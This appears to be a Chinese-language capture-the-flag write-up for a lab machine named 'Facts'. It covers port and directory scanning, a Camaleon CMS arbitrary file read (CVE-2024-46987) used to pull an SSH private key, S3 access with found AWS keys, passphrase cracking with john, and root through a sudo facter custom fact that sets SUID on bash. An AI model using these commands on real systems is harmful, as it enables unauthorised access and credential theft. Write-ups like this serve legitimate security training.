Nmap #
[/home/kali/Facts]$ nmap facts.htb -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open http nginx 1.26.3 (Ubuntu)
|_http-title: facts
|_http-server-header: nginx/1.26.3 (Ubuntu)
Camaleon CMS #
进行目录扫描得到/admin
[/home/kali/Facts]$ feroxbuster -u 'http://facts.htb/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://facts.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 124l 552w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 121l 443w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 69l 448w 30396c http://facts.htb/randomfacts/logopage2.png
200 GET 129l 132w 3508c http://facts.htb/sitemap
200 GET 8l 11w 183c http://facts.htb/rss
200 GET 66l 519w 44082c http://facts.htb/randomfacts/primary-question-mark.png
404 GET 2l 9w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c http://facts.htb/randomfacts/
404 GET 114l 371w 4836c http://facts.htb/fonts.googleapis.com/css
200 GET 271l 1166w 19187c http://facts.htb/search
200 GET 160l 773w 15365c http://facts.htb/finland-happiest
200 GET 172l 920w 19730c http://facts.htb/animal-ejected
200 GET 172l 913w 19727c http://facts.htb/first-impressions
200 GET 178l 965w 21754c http://facts.htb/dolphin-fact
404 GET 114l 371w 4836c http://facts.htb/fonts.googleapis.com/
200 GET 166l 833w 17324c http://facts.htb/anne-frank
200 GET 160l 721w 15004c http://facts.htb/animal-sweat
200 GET 160l 733w 14975c http://facts.htb/cute-animals
200 GET 172l 925w 19677c http://facts.htb/dark-chocolate
200 GET 64l 988w 206540c http://facts.htb/assets/camaleon_cms/image-not-found-fc3c0e66dc61abf74010e63ef65a2e23c4cb40a3320408f2711f82fdc22b503f.png
200 GET 172l 889w 19556c http://facts.htb/cats-attachment
200 GET 8l 2294w 169312c http://facts.htb/assets/themes/camaleon_first/assets/css/main-41052d2acf5add707cadf8d1c12a89a9daca83fb8178fdd5c9105dc6c566d25d.css
200 GET 9958l 40904w 330571c http://facts.htb/assets/themes/camaleon_first/assets/js/main-2d9adb006939c9873a62dff797c5fc28dff961487a2bb550824c5bc6b8dbb881.js
200 GET 281l 1177w 19593c http://facts.htb/page
302 GET 0l 0w 0c http://facts.htb/admin => http://facts.htb/admin/login
然后随意注册一个账号
CVE-2024-46987 #
找到了一个能读取任意文件的漏洞
[main][/home/kali/Facts/CVE-2024-46987]$ python CVE-2024-46987.py -u http://facts.htb --user hyh -p hyh /home/william/user.txt
然后可以读取到trivia用户的密钥
[main][/home/kali/Facts/CVE-2024-46987]$ python CVE-2024-46987.py -u http://facts.htb --user hyh -p hyh /home/trivia/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAGlzSmdW
ZrLblO0eRPGK7YAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKq8HjUGp82A3FsM
tm9O9XCpr91gUl6GxOoCiABwNEIIAAAAoFhsNkdNhHEAMcmYb+xau1Q+FpIEfRYcWIB1Tu
AWS #
另外可以回到后台继续寻找,发现aws相关凭证
[/home/kali/Facts]$ aws configure
AWS Access Key ID [None]: AKxxxxxxxxxx
AWS Secret Access Key [None]: 987zTmyfmQxxxxxxxxxxxx
Default region name [None]: us-east-1
Default output format [None]:
[/home/kali/Facts/s3-files]$ aws s3 ls --endpoint-url http://facts.htb:54321
2025-09-11 20:06:52 internal
2025-09-11 20:06:52 randomfacts
发现有两个桶,其中的internal就是trivia目录,拿到其中的密钥也是一样的
[/home/kali/Facts/s3-files]$ aws s3 ls s3://internal/ --endpoint-url http://facts.htb:54321
PRE .bundle/
PRE .cache/
PRE .ssh/
2026-01-09 02:45:13 220 .bash_logout
2026-01-09 02:45:13 3900 .bashrc
2026-01-09 02:47:17 20 .lesshst
2026-01-09 02:47:17 807 .profile
[/home/kali/Facts/s3-files]$ aws s3 cp s3://internal/.ssh/id_ed25519 ./ --endpoint-url http://facts.htb:54321
download: s3://internal/.ssh/id_ed25519 to ./id_ed25519
[/home/kali/Facts/s3-files]$ cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAGlzSmdW
ZrLblO0eRPGK7YAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKq8HjUGp82A3FsM
tm9O9XCpr91gUl6GxOoCiABwNEIIAAAAoFhsNkdNhHEAMcmYb+xau1Q+FpIEfRYcWIB1Tu
FQIcjI0K0ljydKEplJsOTY/fOQNS6R+QjL8JFXtxgPP5dO6+3o2exe2bVKAFJfkVcBFjDE
ssh2john #
不过密钥不能用于直接登录,要爆破密码
[/home/kali/Facts/s3-files]$ chmod 600 id_ed25519
[/home/kali/Facts/s3-files]$ ssh -i id_ed25519 trivia@facts.htb
The authenticity of host 'facts.htb (10.129.24.236)' can't be established.
ED25519 key fingerprint is SHA256:fygAnw6lqDbeHg2Y7cs39viVqxkQ6XKE0gkBD95fEzA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'facts.htb' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_ed25519':
[/home/kali/Facts/s3-files]$ ssh2john id_ed25519 >> ssh.hash
[/home/kali/Facts/s3-files]$ john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz (id_ed25519)
1g 0:00:01:04 DONE (2026-02-04 19:35) 0.01557g/s 49.84p/s 49.84c/s 49.84C/s billy1..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
登录上去同样也能拿到user.txt
Root #
查看sudo -l
trivia@facts:/home/william$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter
查看具体的文件内容
trivia@facts:/home/william$ file /usr/bin/facter
/usr/bin/facter: Ruby script, ASCII text executable
trivia@facts:/home/william$ cat /usr/bin/facter
#!/usr/bin/ruby
# frozen_string_literal: true
require 'pathname'
require 'facter/framework/cli/cli_launcher'
Facter::OptionsValidator.validate(ARGV)
processed_arguments = CliLauncher.prepare_arguments(ARGV)
CliLauncher.start(processed_arguments)
很简单,gtfobin上有
- facter | GTFOBins
trivia@facts:/home/william$ mkdir -p /tmp/exploit_facts
trivia@facts:/home/william$ cd /tmp/exploit_facts/
trivia@facts:/tmp/exploit_facts$ cat > /tmp/exploit_facts/exploit.rb << 'EOF'
#!/usr/bin/env ruby
puts "custom_fact=exploited"
system("chmod +s /bin/bash")
EOF
trivia@facts:/tmp/exploit_facts$ sudo /usr/bin/facter --custom-dir=/tmp/exploit_facts/ x
custom_fact=exploited
trivia@facts:/tmp/exploit_facts$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1740896 Mar 5 2025 /bin/bash
